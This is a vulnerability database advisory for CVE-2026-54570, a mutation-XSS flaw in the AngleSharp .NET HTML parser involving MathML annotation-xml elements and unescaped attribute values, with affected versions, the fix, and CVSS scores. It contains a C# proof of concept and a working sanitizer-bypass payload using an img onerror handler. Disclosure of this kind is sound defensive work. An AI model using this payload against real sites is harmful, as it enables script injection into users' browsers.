Mend.io Vulnerability Database
The largest open source vulnerability database
What is a Vulnerability ID?
New vulnerability? Tell us about it!
CVE-2026-54570
Published:July 17, 2026
Updated:August 02, 2026
Summary The HTML specification requires that a MathML "<annotation-xml>" element with "encoding="text/html"" or "encoding="application/xhtml+xml"" is treated as an HTML integration point. Content inside it must be parsed as HTML, not MathML. AngleSharp does not implement this correctly. As a result, the parser produces a DOM tree that differs from what a browser will build (different namespaces if "encoding="text/html"" is not treated) when given the same serialized output. Two bugs combine to make this exploitable: - Missing HtmlTip flag: MathAnnotationXmlElement is never assigned NodeFlags.HtmlTip based on its encoding attribute, so the Consume() dispatch always routes tokens to Foreign() instead of Home() (HTML mode). - Unescaped < > in attribute values: HtmlMarkupFormatter.WriteAttributeValue() does not escape < or > characters, only & and ". This allows injected markup to break out of attribute values on re-parse. See "Escape "<" and ">" in attributes when serializing HTML #6235 " (https://github.com/whatwg/html/issues/6235) Details In "MathAnnotationXmlElement" ("AngleSharp/Mathml/Dom/Internal/MathAnnotationXmlElement.cs"): // Current — HtmlTip is never set : base(owner, TagNames.AnnotationXml, prefix, NodeFlags.Special | NodeFlags.Scoped) Because "HtmlTip" is absent, the token dispatch in "Consume()" always sends tokens to "Foreign()" when inside "annotation-xml", regardless of the encoding attribute. The compensating check in "ForeignNormalTag()" only covers tags in "AllForeignExceptions" and is entirely bypassed during fragment parsing ("innerHTML" setter) due to an "if (!IsFragmentCase)" guard. In "HtmlMarkupFormatter.WriteAttributeValue()" ("AngleSharp/Html/HtmlMarkupFormatter.cs"): // Escapes & " and \u00A0, but NOT < or > case Symbols.Ampersand: stringBuilder.Append("&"); break; case Symbols.NoBreakSpace: stringBuilder.Append(" "); break; case Symbols.DoubleQuote: stringBuilder.Append("""); break; default: stringBuilder.Append(value[i]); break; // < and > pass through raw PoC The following program demonstrates that AngleSharp’s parser misses the injected "<img>" element. A sanitizer walking this DOM would see nothing dangerous, yet the serialized output re-parses in a browser as a live "<img onerror>" trigger. using System; using System.Linq; using AngleSharp.Html.Parser; public class Program { static readonly string Payload1 = "<math>" + "<annotation-xml encoding="text/html">" + "<title><a encoding="</title><img src=x onerror=alert()>">" + "</annotation-xml></math>"; public static void Main() { var parser = new HtmlParser(); Check(parser, Payload1, "IMG", "AngleSharp missed <img> – VULNERABLE (mXSS via attribute serialization)", "AngleSharp found <img> – SAFE"); } static void Check(HtmlParser parser, string html, string tag, string failMsg, string passMsg) { var doc = parser.ParseDocument(html); var tags = doc.All.Select(e => e.TagName).ToHashSet(); var found = tags.Contains(tag); Console.WriteLine(found ? passMsg : failMsg); Console.WriteLine("Serialized output:"); Console.WriteLine(doc.DocumentElement.OuterHtml); } } Output: AngleSharp missed <img> – VULNERABLE (mXSS via attribute serialization) Serialized output: <html><head></head><body><math><annotation-xml encoding="text/html"><title><a encoding="</title><img src=x onerror=alert()>"></a></title></annotation-xml></math></body></html> The "title" tag may be swapped out for "style" and other RCDATA elements. When a browser receives this string and parses "annotation-xml encoding="text/html"" as an HTML integration point, the "</title>" closes the title element and the "<img>" fires its onerror handler. Impact Implemented HTML sanitizers that depend and trust AngleSharp's ability to parse HTML correctly may be bypassable, as AngleSharp fails to acknowledge certain vectors under certain conditions. This reduces AngleSharp's credibility as a conformant HTML parser.
Affected Packages
anglesharp (DOT_NET):
Affected version(s) >=0.2.0.25472 <1.5.0
Fix Suggestion:
Update to version 1.5.0
anglesharp (NUGET):
Affected version(s) >=0.2.0 <1.5.0
Fix Suggestion:
Update to version 1.5.0
Do you need more information?
Contact Us
CVSS v4
Base Score:
7.1
Attack Vector
NETWORK
Attack Complexity
HIGH
Attack Requirements
NONE
Privileges Required
NONE
User Interaction
PASSIVE
Vulnerable System Confidentiality
LOW
Vulnerable System Integrity
HIGH
Vulnerable System Availability
NONE
Subsequent System Confidentiality
LOW
Subsequent System Integrity
HIGH
Subsequent System Availability
NONE
CVSS v3
Base Score:
6.9
Attack Vector
NETWORK
Attack Complexity
HIGH
Privileges Required
NONE
User Interaction
REQUIRED
Scope
CHANGED
Confidentiality
LOW
Integrity
HIGH
Availability
NONE
Weakness Type (CWE)
Improper Neutralization of Script-Related HTML Tags in a Web Page (Basic XSS)